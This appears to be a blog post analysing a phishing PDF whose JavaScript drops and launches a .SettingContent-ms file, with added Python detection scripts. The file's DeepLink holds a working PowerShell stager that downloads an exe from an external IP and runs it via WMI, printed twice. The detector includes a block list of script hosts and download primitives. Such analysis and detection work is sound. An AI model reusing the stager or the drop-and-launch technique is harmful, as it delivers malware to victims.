This is a neat PDF sample that I saw mentioned on @c0d3inj3cT’s Twitter, and wanted to take a look for myself. As @c0d3inj3cT says, it is a PDF that drops a SettingContent-ms file, which then uses PowerShell to download and execute the next stage. I had been on the lookout for PDFs that try to run code to play with, so this seemed like a good place to dive in.

File Info

Filename inovoice-019338.pdf
sha256 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
VT Link https://www.virustotal.com/#/file/576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4/details
References https://twitter.com/c0d3inj3cT/status/1017553433128103936
  https://www.hybrid-analysis.com/sample/576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4?environmentId=120

Why This Post

There’s nothing at all ground-breaking in this post. In fact, I’ll come to the same conclusions that @c0d3inj3cT does. Still, as I’m a bit more of a noob at this, I thought it would be useful to do the analysis myself, and this post is just to show my work.

PDF Tools

To look at a pdf file, I’ll rely heavily on two tools from Didier Stevens, pdfid and pdf-parser. pdfid provides an overview of the objects in a pdf, and highlights suspicious ones that could be used for malicious activity. pdf-parser can break out individual objects, including decoding raw streams to get to their underlying data.

inovoice-019338.pdf

Overview of Features w/ pdfid

We’ll start with pdfid, which will give us an overview of the different types of tags / objects in the pdf file:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdfid 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
PDFiD 0.2.5 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
 PDF Header: %PDF-1.4
 obj                   13
 endobj                13
 stream                 3
 endstream              3
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    2
 /JavaScript            3
 /AA                    0
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          1
 /XFA                   0
 /URI                   0
 /Colors > 2^24         0

Right off the bat, the things that jump out at me are the /OpenAction and the javascript (/JS and /JavaScript).

Pivoting From /OpenAction

Now we dive in with pdf-parser. First, let’s check out the /OpenAction, since that will run on opening the pdf.

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --search OpenAction 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 12 0
 Type: /Catalog
 Referencing: 7 0 R, 11 0 R

  <<
    /Type /Catalog
    /Pages 7 0 R
    /Names 11 0 R
    /OpenAction
      <<
        /S /JavaScript
        /JS '(function11\\(\\)'
        ; )
      >>
  >>

It’s going to call a javascript function function11(), and based on the /Names tag, we’ll pivot to object 11 to look for it. Let’s dump that:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --object 11 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 11 0
 Type:
 Referencing: 9 0 R, 10 0 R

  <<
    /JavaScript 9 0 R
    /EmbeddedFiles 10 0 R
  >>

That points to javascript in object 9, and an embedded file in object 10. We’ll follow the javascript in 9, which points us to 4, which points to 3:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --object 9 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 9 0
 Type:
 Referencing: 4 0 R

  <<
    /Names [(0000000000000000) 4 0 R]
  >>


remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser --object 4 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
obj 4 0
 Type:
 Referencing: 3 0 R

  <<
    /S /JavaScript
    /JS 3 0 R
  >>

Dumping object 3 shows it contains a stream, which is encoded (/FlateDecode):

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 3
obj 3 0
 Type:
 Referencing:
 Contains stream

  <<
    /Length 136
    /Filter /FlateDecode
  >>

Javascript

If we add --raw and --filter to the dump, we can see the full javascript. We’ll run pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 3 --raw --filter to get:

function function11(){
var functionDataMass = {};functionDataMass['nLaunch'] = 2;

functionDataMass['cName'] = 'downl.SettingContent-ms';

functionDataMass['r2'] = 'exportDataObject';
this[functionDataMass['r2']](functionDataMass);}

Javascript doc.exportDataObject

A file inside a PDF is known as a “Data Object”. There’s a function doc.exportDataObject that can be used to write a file to disk and potentially open it. One reference for Data Objects in PDFs can be found here.

According to the Adobe Javascript Spec, the exportDataObject function takes up to four parameters:

  • cName - The name of the object to extract
  • cDIPath (optional) - Path to extract the data to; no longer supported as of version 6.
  • bAllowAuth (optional) - If true, will prompt user for Authorization. Default is false.
  • nLaunch (optional) - Controls if the file is launched (opened) after saving.
    0 - Save, don’t launch.
    1 - Save and launch. Prompt user for path to save.
    2 - Save and launch. Save to temporary path.

File Export in this Document

With that in mind, let’s review the script above. This is pretty simple, unobfuscated javascript. It creates a dictionary object in the first three statements, which will look like this:

{ 'r2': 'exportDataObject', 'nLaunch': 2, 'cName': 'downl.SettingContent-ms' }

Then it calls this[functionDataMass['r2']](functionDataMass);, which simplifies to this.exportDataObject({'nLaunch': 2, 'cName': 'downl.SettingContent-ms'}). That will save the file downl.SettingContent-ms to a temporary path, and then open it. It will pop a prompt asking the user if they want to do this, but if they do, the file will open.
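To tie the three pdf-parser steps above together (the pdfid keyword overview, the FlateDecode stream dump, and reading the exportDataObject parameters out of the decoded script), here is an added Python example. It is not pdfid or pdf-parser and not code from the original post; it is a small triage script that counts the same risk keywords pdfid reports, inflates /FlateDecode streams with zlib the way --raw --filter does, and then looks for an exportDataObject call and its nLaunch value. The PDF it operates on is constructed inline (a minimal, not reader-valid file with no xref table) and mirrors the object chain of this document; the script inside it and the helper names are hypothetical.

```python
import re
import zlib

# Keywords pdfid reports as risk indicators; counted as whole name tokens so
# that /JS does not also count /JavaScript.
SUSPICIOUS_KEYWORDS = [b"/OpenAction", b"/AA", b"/JS", b"/JavaScript", b"/Launch",
                       b"/EmbeddedFile", b"/AcroForm", b"/XFA", b"/RichMedia", b"/ObjStm"]

OBJ_RE = re.compile(rb"(\d+) 0 obj(.*?)endobj", re.DOTALL)
STREAM_HEAD_RE = re.compile(rb"<<(.*)>>\s*stream\r?\n", re.DOTALL)

# Constructed sample script (hypothetical): same shape as the decoded object 3
# above, so the report shows how the nLaunch value is recovered.
SAMPLE_SCRIPT = (b"function function11(){ var d = {}; d['nLaunch'] = 2;\n"
                 b"d['cName'] = 'downl.SettingContent-ms'; d['r2'] = 'exportDataObject';\n"
                 b"this[d['r2']](d); }")


def build_sample_pdf(script: bytes) -> bytes:
    """Construct a minimal PDF (no xref, not meant to be opened) whose catalog
    /OpenAction calls function11(), stored in a FlateDecode stream that is
    reached through the /Names tree, as in the post's sample."""
    compressed = zlib.compress(script)
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /Names 4 0 R\n"
        b"   /OpenAction << /S /JavaScript /JS (function11\\(\\);) >> >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
        b"3 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
        + compressed + b"\nendstream\nendobj\n",
        b"4 0 obj\n<< /JavaScript << /Names [(0000000000000000) 5 0 R] >> >>\nendobj\n",
        b"5 0 obj\n<< /S /JavaScript /JS 3 0 R >>\nendobj\n",
    ]
    return b"%PDF-1.4\n" + b"".join(objs) + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def normalize_names(pdf: bytes) -> bytes:
    """Undo #xx hex escapes in names (/J#53 is the same name as /JS) so a
    trivially escaped keyword is still counted."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), pdf)


def count_keywords(pdf: bytes) -> dict:
    """pdfid-style keyword counts over the whole file."""
    data = normalize_names(pdf)
    return {kw.decode(): len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9_])", data))
            for kw in SUSPICIOUS_KEYWORDS}


def extract_streams(pdf: bytes) -> dict:
    """Map object number -> stream contents, inflating /FlateDecode streams
    (what pdf-parser --raw --filter does). Other filters are returned raw."""
    out = {}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(2)
        head = STREAM_HEAD_RE.search(body)
        if head is None:
            continue                       # not a stream object
        dictionary, start = head.group(1), head.end()
        # Prefer a direct integer /Length; fall back to the endstream marker
        # when /Length is an indirect reference (e.g. /Length 7 0 R).
        length = re.search(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)", dictionary)
        end = start + int(length.group(1)) if length else body.rfind(b"endstream")
        raw = body[start:end]
        if b"/FlateDecode" in dictionary:
            try:
                raw = zlib.decompress(raw)
            except zlib.error:
                pass                       # corrupt or truncated: keep raw bytes
        out[num] = raw
    return out


def find_export_calls(streams: dict) -> list:
    """Report decoded streams that call exportDataObject, with the nLaunch value
    they set (2 = save to a temporary path and launch, as in this document)."""
    hits = []
    for num, data in streams.items():
        if b"exportDataObject" in data:
            m = re.search(rb"nLaunch['\"]?\]?\s*[:=]\s*(\d)", data)
            hits.append((num, int(m.group(1)) if m else None))
    return hits


def triage(pdf: bytes) -> dict:
    return {"keywords": count_keywords(pdf),
            "export_calls": find_export_calls(extract_streams(pdf))}


if __name__ == "__main__":
    report = triage(build_sample_pdf(SAMPLE_SCRIPT))
    for name, n in report["keywords"].items():
        if n:
            print(f"{name:14} {n}")
    for num, launch in report["export_calls"]:
        print(f"object {num}: exportDataObject call with nLaunch={launch}")
```

On the constructed file the keyword counts come out the same as pdfid reported for the real sample (/OpenAction 1, /JS 2, /JavaScript 3), and the decoded stream is flagged as an exportDataObject call with nLaunch=2. Real parsers track object lengths and cross-reference tables instead of regexes; this version is enough to show why nLaunch=2 next to an /EmbeddedFile is the combination worth alerting on.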

Embedded File

Now we’d better figure out what the embedded file is. Above we saw a reference to it at object 10. Let’s check that out:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 10
obj 10 0
 Type:
 Referencing: 2 0 R

  <<
    /Names [(downl.SettingContent-ms) 2 0 R]
  >>

Unsurprisingly, we see the file is named downl.SettingContent-ms. Let’s pivot to object 2, which will refer us to object 1, to see what it looks like:

remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 2
obj 2 0
 Type: /Filespec
 Referencing: 1 0 R, 1 0 R

  <<
    /Type /Filespec
    /F (downl.SettingContent-ms)
    /UF (downl.SettingContent-ms)
    /EF
      <<
        /F 1 0 R
        /UF 1 0 R
      >>
    /Desc (downl.SettingContent-ms)
  >>


remnux@remnux:~/host-malware/inovoice-019338.pdf$ pdf-parser 576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4 --object 1
obj 1 0
 Type: /EmbeddedFile
 Referencing:
 Contains stream

  <<
    /Length 508
    /Type /EmbeddedFile
    /Filter /FlateDecode
    /Params
      <<
        /ModDate "(D:20180712121742+03'00')"
        /Size 905
      >>
  >>

Again, adding --raw --filter will give us the embedded file itself.

Overall PDF structure

Now we have the structure of the PDF, at least as far as the objects that relate to the script that runs on opening the document:

obj 12 (/Catalog)
 |- /OpenAction -> JavaScript: function11()
 '- /Names -> obj 11
     |- /JavaScript -> obj 9 -> obj 4 -> obj 3 (FlateDecode stream holding function11)
     '- /EmbeddedFiles -> obj 10 -> obj 2 (/Filespec) -> obj 1 (/EmbeddedFile stream: downl.SettingContent-ms)

.SettingContent-ms

So what is a .SettingContent-ms file? It was introduced in Windows 10 to allow creating shortcuts to Windows 10 settings pages. However, attackers have figured out that the <DeepLink> tag lets them run arbitrary PowerShell from inside one. These files have been used to get around application whitelisting and the blocking of malicious attachment types.

File From this PDF

So let’s check out this file:

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>Powershell -nop -windowstyle hidden -c
  $a='http://169.239.129.117/cal'
   $b=\"$env:temp\update12.exe\"
   $webc = [System.Net.WebClient]::new()
   $webc.DownloadFile($a, $b)
   $pclass = [wmiclass]'root\cimv2:Win32_Process'
   $pclass.Create($b, '.', $null)
   </DeepLink>
   </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
  </SettingIdentity>
  <SettingInformation>
   <Description>@shell32.dll,-4161</Description>
   <Keywords>@shell32.dll,-4161</Keywords>
   </SettingInformation>
  </SearchableContent>
 </PCSettings>

Basically, it runs the following PowerShell:

   $a='http://169.239.129.117/cal'
   $b=\"$env:temp\update12.exe\"
   $webc = [System.Net.WebClient]::new()
   $webc.DownloadFile($a, $b)
   $pclass = [wmiclass]'root\cimv2:Win32_Process'
   $pclass.Create($b, '.', $null)

It creates a WebClient object, uses it to download a malicious exe, and uses WMI to start the process.
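As an added example, not part of the original post and not a Microsoft tool, the following Python script parses a .SettingContent-ms file and flags any <DeepLink> that launches a script host, fetches something over HTTP, or uses the hidden-window and download primitives seen in the file above, instead of simply opening a settings page. Both samples are constructed for this example: the suspicious one mirrors the structure of this document's file with placeholder values (a TEST-NET address and generic filenames), the benign one uses a made-up control.exe target and an all-zero HostID, and the token list is an assumption about what a settings shortcut should never contain.

```python
import re
import xml.etree.ElementTree as ET

# Tokens that should not appear in a settings shortcut: script hosts and LOLBins,
# download/execution primitives, and the hidden-window / encoded-command switches
# this document's sample uses. Matched case-insensitively against the DeepLink text.
SUSPICIOUS_TOKENS = [
    r"\bpowershell(\.exe)?\b", r"\bpwsh\b", r"\bcmd(\.exe)?\b", r"\bmshta\b",
    r"\brundll32\b", r"\bregsvr32\b", r"\b[cw]script\b", r"\bcertutil\b", r"\bbitsadmin\b",
    r"webclient", r"downloadfile", r"downloadstring", r"invoke-expression", r"\biex\b",
    r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"https?://",
    r"\[wmiclass\]", r"win32_process", r"\$env:temp",
]

# Constructed benign-looking sample (hypothetical values, not a real Windows file).
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>%windir%\\system32\\control.exe /name Microsoft.Sound</DeepLink>
  </ApplicationInformation>
  <SettingIdentity><PageID></PageID><HostID>{00000000-0000-0000-0000-000000000000}</HostID></SettingIdentity>
 </SearchableContent>
</PCSettings>
"""

# Constructed suspicious sample: same shape as the file dropped by this PDF,
# with a TEST-NET placeholder address and generic filenames.
SUSPICIOUS_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>Powershell -nop -windowstyle hidden -c
   $a='http://203.0.113.10/stage2'
   $b="$env:temp\\stage2.exe"
   $webc = [System.Net.WebClient]::new()
   $webc.DownloadFile($a, $b)
   </DeepLink>
  </ApplicationInformation>
  <SettingIdentity><PageID></PageID><HostID>{00000000-0000-0000-0000-000000000000}</HostID></SettingIdentity>
 </SearchableContent>
</PCSettings>
"""


def deep_links(xml_text: str) -> list:
    """Return the text of every <DeepLink> element, whatever namespace it is in."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [(el.text or "").strip() for el in root.iter()
            if el.tag == "DeepLink" or el.tag.endswith("}DeepLink")]


def assess(xml_text: str) -> dict:
    """Map each DeepLink target to the suspicious token patterns it matches."""
    return {link: [t for t in SUSPICIOUS_TOKENS if re.search(t, link, re.IGNORECASE)]
            for link in deep_links(xml_text)}


def is_suspicious(xml_text: str) -> bool:
    """Flag the file if any DeepLink matches at least one token."""
    return any(hits for hits in assess(xml_text).values())


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS_SAMPLE)):
        for link, hits in assess(sample).items():
            verdict = "FLAG" if hits else "ok"
            print(f"[{verdict}] {label}: {link.splitlines()[0]!r} -> {hits}")
```

The same check can run over every *.SettingContent-ms file found in %TEMP% or in mail attachments; on endpoints, the process tree is the complementary signal, since a settings shortcut that is behaving normally does not spawn powershell.exe.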

User Experience

On opening the document, there’s not much there, but it does try to open the file immediately. As the Adobe Javascript documentation indicated, there is a pop-up when this occurs:

On clicking open, a blue PowerShell window pops up for a second, and then disappears. I suspect if it was able to talk to the C2 IP, it would disappear much faster.

If we check in the PowerShell event logs (remember we configured Windows to do PowerShell script block logging in this post), we can see the script ran as expected:

Stage Two - update12.exe

At the time of this writing, the second stage download server was no longer up. This isn’t surprising, since the document has a creation date of 12 July, and was first submitted to VT that same day.

According to others who have looked at this file, it sounds like it was downloading FlawedAmmyy (ref, ref).

Summary

While not nearly as common as macro-enabled documents in phishing, there are still actors out there using PDFs to spearphish. This one was using a technique that SpecterOps blogged about on June 11, the SettingContent-ms file. It was pretty simple to break down the document and see what’s going on.